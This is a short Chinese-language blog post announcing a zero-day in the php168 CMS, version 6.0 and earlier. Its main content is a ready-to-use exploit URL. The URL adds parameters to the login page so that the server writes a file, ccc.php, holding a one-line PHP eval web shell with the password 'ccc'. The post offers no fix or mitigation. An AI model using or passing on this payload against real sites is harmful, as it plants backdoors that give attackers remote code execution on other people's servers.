msgbartop
同一天地间,同一网络下,P9′Blog与您共享今日互联网→WWW.P9.NET.CN
msgbarbottom

php1686.0被爆0day可瞬间获得webshell

php168是一套php写的cms程序,在业界是比较出名的而且一直很高调,此次被公布出来的0day不仅影响到php168 6.0而且还牵扯到6.0以下的所有版本.测试语句:在登陆界面网址后面加上?makehtml=1&chdb[htmlname]=ccc.php&chdb[path]=cache&content=?php%20@eval($_POST[ccc]);?即可获得一个文件名ccc.php密码为ccc的php小马.

Tags:

Leave a Comment

You must be logged in to post a comment.